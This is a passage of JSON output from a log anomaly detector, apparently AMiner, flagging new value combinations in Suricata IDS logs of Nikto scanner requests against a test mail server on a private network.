combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sys", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.199703+0000\",\"flow_id\":1995991545415704,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.199703, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1995991545415704,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sys\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sys\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sys", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sys", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46810, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1995991545415704,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1995991545415704, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.199703+0000\",\"flow_id\":1995991545415704,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.201581 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46812 -> 192.168.10.154:80", "/parser/model/time": 1583349514.201581, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46812, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.201581 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46812 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nn", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.201869+0000\",\"flow_id\":1416587572285516,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.201869, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1416587572285516,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nn\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nn\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nn", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nn", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46812, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1416587572285516,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1416587572285516, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.201869+0000\",\"flow_id\":1416587572285516,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.203262 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46814 -> 192.168.10.154:80", "/parser/model/time": 1583349514.203262, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46814, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.203262 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46814 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.eml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.203479+0000\",\"flow_id\":1094550924433338,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.203479, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1094550924433338,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.eml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.eml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.eml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.eml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46814, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1094550924433338,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1094550924433338, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.203479+0000\",\"flow_id\":1094550924433338,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
